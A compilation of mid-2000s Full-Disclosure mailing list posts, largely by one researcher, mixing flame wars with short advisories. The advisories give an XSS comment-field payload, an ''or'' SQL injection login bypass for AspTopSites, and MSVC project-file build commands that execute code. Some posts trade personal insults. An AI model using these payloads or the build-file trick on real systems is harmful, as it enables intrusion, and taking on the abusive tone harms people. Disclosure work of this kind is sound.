I completely agree with the milw0rm point. The intent of my reply was to remind MW that he too was a clueless one ( in recent times at that ) and that he would be well served to spare others the abuse he got when he was learning. The incivility of FD and the space in general is a bit tiring. well, i may have to also agree that my choice phrasing was abit... imature. next time i will wait to reply after my 2 cups of coffee. ( thanks for the deserved slap in the face Jason ) however, i still stand by the fact that full disclosure style of reporting security flaws has prompted many vendors to be more dilligent in fixing issues and working with persons who discover vulnerabilities, as well as doing more in-house testing and auditing. further, IMHO, it is better to have exploit code publicly available than solely being controlled and utilized by the blackhat underground, which makes the internet an actual safer place for everyone. ( see previous paragraph ) cheers, mw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] researchers want slice of profit and vow pull outof mailing list disclosures
hi n3td3v you boast that you are moderated to people saying that John Cartwright is on my side cuz he lets my posts through hahahah what a JOKE further, you realy need to stop spamming me on YahooIM... n3td3v: im about to deface zone-h n3td3v: the joomla cms is full of vulns n3td3v: u peice of shit n3td3v: bye yea, real mature there mr big international security boi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] researchers want slice of profit and vow pulloutof mailing list disclosures
This is what really happened... mw: deface zone-h for me n3td3v: why? mw: cos i hate the new layout n3td3v: lol n3td3v: k give me the password to zone-h mw: ok, hold on n3td3v mw: e-mail sent, the password is in the e-mail n3td3v: cool, thanks n3td3v: lol, it works! n3td3v: i thought you were joking me mw: no probs n3td3v mw: just remember, this conversation never happened k? n3td3v: sure here is the actual convo... n3td3v : why did you post the i.m? Morning Wood: just like your contryman Phill Collins says... true colors n3td3v : hahahahahahaha... you know i.m's are easily forged Morning Wood: yes bet we know its genuine, and i dont make up anything, thats the difference between us n3td3v : i could post one as well saying you were going to deface zone-h too Morning Wood: yea, you need lies n3td3v : infact, i could post one saying you gave me exploit code to do it n3td3v : mw: deface zone-h for me n3td3v : n3td3v: why? n3td3v : mw: cos i hate the new layout n3td3v : n3td3v: lol Morning Wood: funny, cuz im z-h staff and speak to Roberto daily n3td3v : n3td3v: k give me the password to zone-h Morning Wood: not to mention i showed him that when you im'd it n3td3v : mw: ok, hold on n3td3v n3td3v : mw: e-mail sent, the password is in the e-mail n3td3v : n3td3v: cool, thanks n3td3v : n3td3v: lol, it works! n3td3v : n3td3v: i thought you were joking me n3td3v : mw: no probs n3td3v n3td3v : mw: just remember, this conversation never happened k? n3td3v : n3td3v: sure now plz go away ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] microsoft france attack details
Zone-h has had an interview with the cracker who defaced http://experts.microsoft.fr and details the method of attack. 0day or corporate ignorance? Full story: http://www.zone-h.org/content/view/4770/31/ Donnie Werner http://zone-h.org http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft-fr defaced
Microsoft France was defaced today by Turkish hackers. http://experts.microsoft.fr/default.aspx a story and a mirror of the defacement are available on Zone-h story: http://www.zone-h.org/component/option,com_frontpage/Itemid,1/ mirror: http://www.zone-h.org/index2.php?option=com_mirrorwrpid=4181592 Donnie Werner http://zone-h.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection
Dick, err Bill, odd product you have... anything i tried to run via GreenBorder simply, how do I say this... DID NOT RUN PERIOD. I am amazed at the effectiveness of your product, it's great! I was fully protected from not being able to do anything at all with your product, simply amazing. When I tried to run Internet Explorer, it simply would not run!!! I was obviously fully protected from all threats, again Dick, err Bill, big props to your Product! Now, being one that just has to back up my security product research, I uninstalled your product to compare my computer use and Internet browsing without your Product's protection. After a reboot see now that my HTML icons are now back with that blue e, not that BIG GREEN SQUARE THINGIE, ( an obvious sign of not being protected ) although I can actually open them now, as well Internet Explorer itself now opens ( I think I'm at rick now huh? ) In my opinion this Product is effective, or not, depending on you Marketing stance and spammimg of security lists touting a questionable product, that offers nothing that I can see of value. cheers, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ASPListPics
- EXPL-A-2006-003 exploitlabs.com Retro Advisory 001 - - ASPListpics - RETRO-RELEASE DATE: === Nov 11, 2004 Duplicate Release: June 06, 2006 by: r0t http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html http://secunia.com/advisories/20517/ OVERVIEW ASPListpics is a highly configurable ASP application that automatically generates fast thumbnail web indexes of images in a folder structure. AFFECTED PRODUCTS = ASPListpics 4.x http://www.iisworks.com DETAILS === 1. XSS ( persistant ) PROOF OF CONCEPT LINKS AND RETRO-POC = 1. XSS ( Cross Site Scripting ) There is persistant XSS inclusion in the comments feature of ASPListpics in the following: field name field comment By embedding various types of XSS into the comment section, we are able to render javascript in the users browser. below is a simple PoC ( Proof of Concept ) enter into the comments section malicious script. comment: ohnoiframe src=http://whatismyip.com;/iframeouch and is rendered as: HTTP://[VUNERABLEHOST]/listpics/listpics.asp?a=rateID=[PICID]Info= SCRIPTING HERE 9000|0 CREDITS === r0t - http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html RETRO-CREDITS = This vulnerability was discovered and researched by Donnie Werner of exploitlabs. At the original time of discovery and retro-release date, the author was not aware of any other advisories or patches available. Retro-Advisories are released when either the same research is released by a 3rd party, old private research that is no longer active, or the product has been patched due to Vendor updates before a formal Exploitlabs advisory was released to the public. Donnie Werner [EMAIL PROTECTED] [EMAIL PROTECTED] -- web: http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] **LosseChange::Debunk it??**
Pentagon Crash Footage released today http://www.judicialwatch.org/flight77.shtml ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] **LosseChange::Debunk it??**
the only fact worth investigating in this is the sales of stocks leading up to 911. viewed from a technical standpoint on the pentagon attack and the towers collapse... well this is just pure bullshit. anyone with basic physics and any amount of avation experience can see the author is absolutly clueless in regards to these technical points. my2bits, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MSIE (mshtml.dll) OBJECT tag vulnerability
Your blog seems to suggest that you are also quite severely mistaken in regard to my identity. Secunia did not notify Microsoft ahead of time in order to allow for them to patch it before it became public. [...] Microsoft chided Zalewski [from Secunia] for jumping the gun and posting his findings before a comprehensive patch could be created, but the researcher is unapologetic. But that's for you to figure out what's wrong in that picture. I will take a shot in the dark here... you do not work for Secunia. and yes... bad blogging is far worse than any 0day, it does nothing but provide inacurate information, hysteria and FUD. Tim... next time you decide to try to write a comprehensive blog entry, do some research first. ( and stop relying on the footer to try to decypher who someone is or not ) Secunia sponsors the FD list, and is not the releasing enity in this case. DAMN THE BLOGGERS!!! cheers, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer User Interface Races, Redeux
Game's up, n3td3v. You can quit hiding behind your fake Yahoo account now. Go away kid, before you hurt somebody. owned! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secunia illegal spam and advisory republication
When you subscribe at grok.org.uk, you are not made aware that Secunia is affiliated with the mailing list and fails to warn users that a Secunia URL will be placed at the bottom of a user or company disclosure. what you fail to see is... we don't care. Further, any information a researcher discloses in public is just that, public. Since you are hellbent on leather here... your oh so loved Securityfocus / Bugtraq does the same thing. Many of my own advisories are put on Bugtraq without me submitting directly. I guess http://www.osvdb.org is just as guilty? Perhaps Milw0rm too? You are mad because you have never once had any information disimenated by any security site, why? Cuz you dont do any research, find vulns, write exploits or have disclosed anything worthy of publication. Further, because of your continued drunken rants, lack of professionalisim and just plain stupidity you never will be a player in the security industry. You fail to see that these faults are yours, and yours alone. As I have said before... get sober, stfu and get a real life. We here ( and the big media you are trying desperatly trying to attract ) don't give a rats ass about you, your drunken meglomaniacal disposition, or anything you do... PERIOD. stfu kthnx bai, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secunia illegal spam and advisory republication
No, Mlw0rm tells you who discovered the vulnerability, as do other sites. Although Secunia tell you it was all their work. I bet you would be pretty pissed if you post one of your XSS or SQL injection, and it appears on the Secunia website the next day saying Secunia FOUND. WRONG WRONG WRONG you cant even backup your rant with facts can you? http://secunia.com/search/?search=Donnie+Werner THANKS FOR PLAYING !!! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secunia illegal spam and advisory republication
You think? I have setup a webpage to tell you what I think of you and everyone else. http://geocities.com/n3td3v who doubts me. One time I added you to Yahoo Messenger thinking you were a friend but you just walk all over me like everyone else. Screw you man thats right, YOU added me ( i never was your friend ) and I tried to warn you about yourself, your drunkeness, and your skewed outlook on life. I think it's funny after I showed you were wrong about Secunia, you now go off on some other rant and roll. ( drop some more eX ok ). Instead you point to some extremely idiotic page that itself shows just how lame you are, your delusions of grandure and the fact that you just plain suck. Stop thinking people are your friends, and actualy try to find a friend ( if they can put up with your paranoid drunk ass that is ) You say you're someone elite, but all you've done is XSS and SQL injection (copy and paste hacking). ANyway, read the webpage hotshot. I may not have produced the most ground breaking exploits and vulns, but I have something you will never atain, and that is RESPECT. I seriously suggest attacking someone who cant think for themselves, dont have a clue, and are within your own peer group ( preeschool - kindergarten ) cheers, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secunia illegal spam and advisory republication
Correction: You have never attained respect from anyone. since you are a bantown troll, I will just disregard you bai ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS
Yahoo! Mail once in a while will ask you to re login again so it's not so anormal. I use Yahoo Mail, I have never once had to re-login in 4 years. dunno... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS
exploit creates a frameset and redirects to http://w00tynetwork.com/x/ ,it's interesting that the redirects to http://211.22.14.50/.yahoomail/x.htm and spoofs a Yahoo login page. upon entering credentals, the site redirects back to http://mail.yahoo.com so it simply looks like a bad login. 211.22.14.50 = www.gbigift.com.tw cheers, mw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS
reflecting on this... the offending url you give is http://w00tynetwork.com/x/ which contains a fake yahoo login ( for webmail ) (( and other exploits embedded within the site )) you state this is a Yahoo Email vulnerability. stop me if im wrong... why would anyone be vulnerable to a Yahoo login redirect phish, if in fact they are already logged in to read the mail in the first place. i can appriciate the possibility of XSS within the Yahoo webmail interface, just not with this particular redirect code ( or site url ) you provide. XSS could be more effectivly used to leverage a browser exploit, rather than ( trying to ) steal your credentals ala phishing 2cents, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Industry calls on Microsoft to scrapPatchTuesday for Critical flaws
- Original Message - From: n3td3v [EMAIL PROTECTED] The problem here is, many of the n3td3v bashers are secretly blackhat trolls (like morning wood etc) and don't add to the discussion of eEye and others ex-fucking-scuse me? grow up you drunk idiot. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Industry calls on Microsoft to scrap PatchTuesday for Critical flaws
Sorry to say the n3td3v group more like Sorry to say n3td3v group does not exist ( kinda like your brain ) umm, there is no n3td3v group so please stop using that phrase, your just trying to make yourself look big and professional to the media / vendor personage that reads this list. .. and that you have a group of rogue employees ( trying to make like there are bonafide sec researchers working for your group ) [ insert much lmfao here ] n3td3v... you are chum, bait, food, just waiting to be extruded out of some orifice like the smelly nasty mess you are. NOW PLZ STFU KTHNX ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Arin.net XSS
same issue that internic had a few years ago.. http://lists.grok.org.uk/pipermail/full-disclosure/2003-May/005092.html cheers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Filemaker Pro 7 - any known exploits/hacksavailable?
- Original Message - From: Knud Erik Højgaard [EMAIL PROTECTED] Pay me for an audit (I will find a bug and give you ammo to say NO), or hire a(n expensive) company like corest/ilja,suresec(not expensive)/eeye/lsd.pl/immunitysec(hi dave)/phenoelit(hi FX) to do the same. I am probably cheaper, they are probably(yeah right, they certainly are) better. -- Knud hard up for 0days are ya Kokanin? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
in all honesty, XSS is a serious vector of attack. however, non-persistant XSS is a much less serious problem than is persistant XSS. Generally XSS is of no harm to the server side anyway. It can however be leveraged as the OP said, but would require a dedicated, pre-formed url string that needs to be presented to the user to be effective. IMHO the OP advisory should not have been posted, because of the non-persistant nature of the flaw at one dedicated site. Issues comes into play via persistant XSS, which is script that may be embedded in a web application, such as a guestbook, or comment section, where people would travel to on their own without the need of a direct link and then rendered upon visitation in the users browser. Further, in todays world of browser exploitation, cookie, session, and/or credential theft is not the only thing to be gainedand is often of minor importanceand information. What is bad is leveraging XSS as a vector for browser exploitation ( can we say IFRAME+WMF ), so you have a way, via XSS to COMPROMISE end users systems. While the OP does have a valid initial point and theory, 1.it is not persistant in nature 2. it is one site, and not a script used on many sites 3. it does require SE at some level to be effective 4. it should not have been posted to FD ( see points 1,2,3 ) my2bits, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Bug in MSVC
What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure their is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. again... this does not exploit the source code. it does exploit the build files. if i was simply compiling badprog.c then launching it, that would be stupid. i am leveraging the project files, not the source code. MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Bug in MSVC
In all this, I am discounting the fact that if someone is building untrusted sources, (s)he is most likely going to run the untrusted program afterwards. this does not run an untrusted program. if you noted, I named it a feature bug and my poc is a simple hello world sample Judging from MS extensive information to me,direct from MSRC, this is an issue. remote code can be pulled in and executed without any notice or warning to the user. I am not leveraging directives for CPP ( cc is the Makefile eqiv) MSVC tends to hide ( especially these actions ) to the end user. cheers, Donnie ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC Firewall Choices
I am looking at supplementing the Windows XP (Pro) SP2 Firewall with a third party product on a bunch of Windows machines. not to plug a product, but http://force.coresecurity.com/ I have recieved many kudos after recommending this to several people. my2bits, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Security Bug in MSVC
- EXPL-A-2006-002 exploitlabs.com Advisory 048 - - MSVC 6.0 run file bug - AFFECTED PRODUCTS = Microsoft Visual Studio 6.0 http://microsoft.com Possibly other products referenced in: http://support.microsoft.com/kb/841189 OVERVIEW Source code project distributions are very popular these days. Generally authors offer code as a project with source, headers, and msvc project files if it is a fairly big project. Most users will simply open up the project.dsw file, ( especialy if it says to do so in a readme.txt or other compiler instructions ) which in turn loads the project.dsp files, which provides the compiler directives. A malicious attacker could embed commands to be executed in the project files, and execute any local code of his choosing. note: this is an implemented feature in MSVC, and should be considered a bug, not a vulnerability. IMPACT == The impact of this is quite severe, as it is possible to script commands such as to launch ftp, retrieve and execute a file from a remote location. DETAILS === By modifying the .dsp files: project settings custom build Commands: command to execute Post-build Step: command to execute 1.a InputPath=.\Release\hello.exe SOURCE=$(InputPath) hello.exe : $(SOURCE) $(INTDIR) $(OUTDIR) calc 1.b PostBuild_Cmds=notepad.exe POC http://exploitlabs.com/files/advisories/msvc-featurebug-POC.zip extract, and open hello.dsw click batch build, build or rebuild all code will execute ( calc.exe and notepad.exe used as an example ) calc.exe = Custom-Build notepad.exe = PostBuild Commands SOLUTION vendor contact: [EMAIL PROTECTED] Sept 20, 2005 http://support.microsoft.com/kb/841189 updated Jan 6, 2006 Microsoft provided these URL's as well: http://msdn.microsoft.com/library/en-us/vsintro7/html/vxurfopenprojectfromwebdialogbox.asp http://msdn2.microsoft.com/en-us/library/bs2bkwxc.aspx SUGGESTED PATCH === Include a dialog box that warns the user, before pre and post build directives can be launched, if the presence of execute directives exist in the build project files. CREDITS === This vulnerability was discovered and researched by Donnie Werner of exploitlabs mail: wood at exploitlabs.com mail: morning_wood at zone-h.org -- web: http://exploitlabs.com web: http://zone-h.org http://exploitlabs.com/files/advisories/EXPL-A-2006-002-msvc-featurebug.txt http://exploitlabs.com/files/advisories/msvc-featurebug-POC.zip ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AspTopSites SQL injection
- EXPL-A-2006-001 exploitlabs.com Advisory 047 - - AspTopSites - AFFECTED PRODUCTS = AspTopSites http://www.maine-net.com/aspts.asp OVERVIEW AspTopSites® runs on your Windows NT/2K/2003 Server and uses Active Server Pages with a MS Access 2000 database. Simply upload AspTopSites®, make one configuration setting and you're ready to start running your own TopSites traffic generator. AspTopSites® comes with full source code... no encoding or DLLs need to be installed on the server. DETAILS === 1. SQL Injection AspTopSites does not filter SQL resulting in full access to the user manager menu. POC === 1. --- entering SQL Injection type statement in the password field causes the statement to be true. http://[host]/topsites/default.asp --- view listings http://[host]/topsites/goto.asp?id=43 --- mouseover id value http://[host]/topsites/includeloginuser.asp --- login here user: [ id value ] password: 'or' note: Vendor Demo Site is Vuln SOLUTION: = vendor contact: Jan 3, 2006 [EMAIL PROTECTED] ( no resp ) Jan 10, 2006 ( no resp = release ) Credits === This vulnerability was discovered and researched by Donnie Werner of exploitlabs Donnie Werner mail: wood at exploitlabs.com mail: morning_wood at zone-h.org -- web: http://exploitlabs.com web: http://zone-h.org http://www.exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to Determine My System Vulnerabilities
I know I feel like the Federal Reserve is safe now. well..., the headers appear to be genuine IS THIS FOR F*CKING REAL The director for IT of the FDRB of Minneapolis is asking the most basic question possible. ARE YOU SERIOUS?!?!? I have three servers running Linux Red Hat OS. I would lke to find a source for information regarding How Too when it comes to determining what level of kernel, SSH, PHP, ect my servers are running. I do know how to check some of these things but am looking for someone who is very knowledgeble and is willing to answer questions about this OS. HOW DID YOU EVEN GET THE JOB??? I BET YOU TOOK A TEST AND HAVE SOME BIG FANCY LETTERS *sigh* this ignat is making what? 75-125k$ / yr and dont know how to get versions from his daemons?!?! wtf wtf wtf omg omg omg *shocked and awed* /me falls over ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: SecurID with Active Directory ?
[If, for instance, you really need to completely eliminate access via passwords, you could use some programmatic method (i.e., Visual Basic) to set your users' Windows passwords to very long, random passwords that never expire. The password change would be captured on the DC and sent to the ACE/Server. The long, random passwords would then be provided with each authentication (and recovered when offline), but the I belive you are meaning a custom VB login.exe at every user station? users will never know their Windows password. unless of course they take to time to look in the custom vb login.exe application, where the user/pass is stored in clear text. This would also be a point of attack if the exe were ever to escape outside infrastructure controls. ( I bring this up as this exact vector was used successfully in a pentest, the exe asked for a user/pass, the application then allowed access to the ftp server and its credentials were stored cleartext in the exe. The developer belived he could hide the actual ftp process from the end user so they did not need to set up user accounts on the ftp server and using the exe to validate against an asp server, thus allowing the application to validate and run. ) although not quite the scenario you describe, i believe the implications would be the same. of course, I could be completely off base MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: what we REALLY learned from WMF
I do know that MS prefers to do extensive testing on patches. ms04-015 , i was told, had to go through over 200 differing infrastructure / product / implimentation testings before release. i am sure some of these test are done for large corps to ensure no breakage across a multitude of architectures, etc. A patch may work properly on 99% of everything, but its that 1% they focus on before formal release. ( esp if that is a large enterprise ) my2bits, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unofficial Microsoft patches help hackers, not security
everyone knows the best official patch is firefox umm, no firefox presents a save or open dialog box. if the user belives it to be a image he / she is intended to view, they will simply open. thus, windows gladly passes the extention handler to WMF, game over. or, they will save and simply passing the mouse over the icon will trigger the exploit, again... game over ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trojan found on Linux server
Yep, when running strings on it I noticed a few IP addresses (219.133.46.212, 61.211.239.84, 64.239.9.236) in there as well as commands indicative of IRC (NOTICE, NICK, PRIVMSG, etc.) 64.239.9.236 = copticpope.tv http://64.239.9.236/ http://copticpope.tv heh? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] new attack technique? usingJavaScript+XML+OWSPost Data
Gaurav, go back to using Cain to spy on your co-workers for your corrupt boss. and btw, you dont hack servers then go to the company to ask for a tender to provide security services ( its called blackmail, but I guess that prety common in Hyderabad ). Have a nice life backstabber! cheers, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS vulnerabilities in Google.com
i see no "n3td3v" credits here... further, i cant concieve of the fact that you would even know what UTF-7 encoding is. IMO all you have ever done is notice weird behavior when info is pulled into your Google group ( like your 1st post about google groups about 9 months ago or so ) from other sources ( or replies ). XSS can be bad or benign depending on if it is persistant in nature or not ( if not it requires a user to click a preformed XSS url ). And yes, persistant XSS can be used to root users if coupled with the latest browser exploit ( and any admin behind the sites firewall / corporate infrastructure ). In the future may I suggest the folowing 1. find your flaw 2. write an advisory 3. send it to the vendor 4. wait for response 5. wait for patches 6. disclose advisory formaly 7. stfu and find your next flaw cheers, mw //= Security Advisory =// - XSS vulnerabilities in Google.com - --[ Author: Yair Amit , Watchfire Corporation http://www.watchfire.com --[ Discovery Date: 15/11/2005 --[ Initial Vendor Response: 15/11/2005 --[ Issue solved: 01/12/2005 --[ Website: www.google.com --[ Severity: High ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BANTOWN PRESENTS: Give me 0day or give me death
troll go home http://www.encyclopediadramatica.com/index.php/Bantown i think we can all see the seriousness of this OP ( not ) and next time... tell your cronies IP-Relay phone is traceable, not to mention against the law to make harassing calls over its service happy hollidays ( i bet your bbq sauce is frozen about this time of the year ) mw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [scip_Advisory] NetGear RP114 Flooding Denial ofService
dunno, but i know this has been an issue since the rt314 product ( 1999-2000? ) a simple nmap -sS target trigers it external, and no supprise internal as well. ( not fun running pentests behind one of these babys ) i dont know if you noticed that existing connections dont appear to be affected ( IM and streaming traffic ) but dns generally gets hosed. my2bits, Donnie Werner http://exploitlabs.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fuzzing testing webapp?
I want to do something like this with a script, tool etc, (Looking fuzzing directory traversal ) http://target/any.asp?data=.../.../.../ - where the variable data= -- this i want to test to found some bugs http://target/cgi-bin/any.cgi?data=var1var2; efuzz is good in windows, and has exactly what you want ( although you can only fuzz one var ) http://www.priestmaster.org/projects/tools/efuzz.zip ( i have found stack overflows with this ) others are avail, such as Peach and Fuzzy, but are python based ( and work quite well ) the secret Google search string is: http://www.google.com/search?hl=enq=fuzzer cheers, mw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Famous n3td3v quotes - The Director's Cut(outnow on DVD)
When you're able to ask an employee at a major dot-com to implement http://security.yahoo.com and they do it, come back to me. your fucking serious? http://security.yahoo.com/ --- basic security info. no major dot-com is stupid enough to NOT follow those recomendations, not to mention it is consumer level advice ( and common sense ). You have seriously outdone yourself here, and blown your cover of being a real security researcher. Please take your drunk, UK meglomaniacal ass and go put a broom in it. ( or just STFU ) unless you can present your formal advisories ( since the flaws are patched, there is no disclosure worry ) to this list, anything you say is hearsay, and thus not believed. sooo next time you save us all from death of the interweb, please be kind enough to back it up with some actual facts so we all can thank you, and realize just how lucky we are to have you in our hearts ( and search engines ). the interweb thanks you, mw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Google is vulnerable from XSS attack
As a owner of a Google Group, I would personally like this patched for the security of my group and that of my personal computer and web browser. hmm... did you pay for this group? did'nt think so read the eula? bet not who owns you? hint: Google ( they own the world ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Report to Recipient(s)
Only those with broken AV software, since that line is not the EICAR test string, according to the definition of the EICAR test string. As many have pointed out, I realize it's supposed to be an attachment : http://www.eicar.org/anti_virus_test_file.htm you would be suprised at all the infected returns this generated when sent http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/0919.html http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/0923.html ( note the : This was a text only message with NAMES only. ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Paypal phishing attempt
Someone with more time than me please report the following scam: http://210.202.161.99/us/Account_verification/webscr-cmd=_login/ for sites outside the usa, it is futile to contact ebay about every site. the best thing is to contact the offending server / hosting / isp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [OTO-54919]: Re: [Full-disclosure] Paypal phishing attempt]
Wtf? I wasn't aware I needed a ticket created ... is everyone else getting these? yes, I think it is tied to an autoresponse email account here on the list ( and very stupid IMHO ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-Disclosure] Return of the Phrack High Council
oops? Database error: pconnect(209.173.128.195, snappoll, $Password) failed. MySQL Error: () Session halted. http://snappoll.com/poll/50150.php ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-Disclosure] Return of the Phrack High Council
hmm, second time vote worked... but um http://www.snappoll.com/view_results.php?poll_id='50150 Database error: Invalid SQL: SELECT * FROM polls WHERE poll_id='50150 MySQL Error: 1064 (You have an error in your SQL syntax near ''50150' at line 1) Session halted. eek ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How do you sniff your LAN subnet in nowdaysswitched networks ?
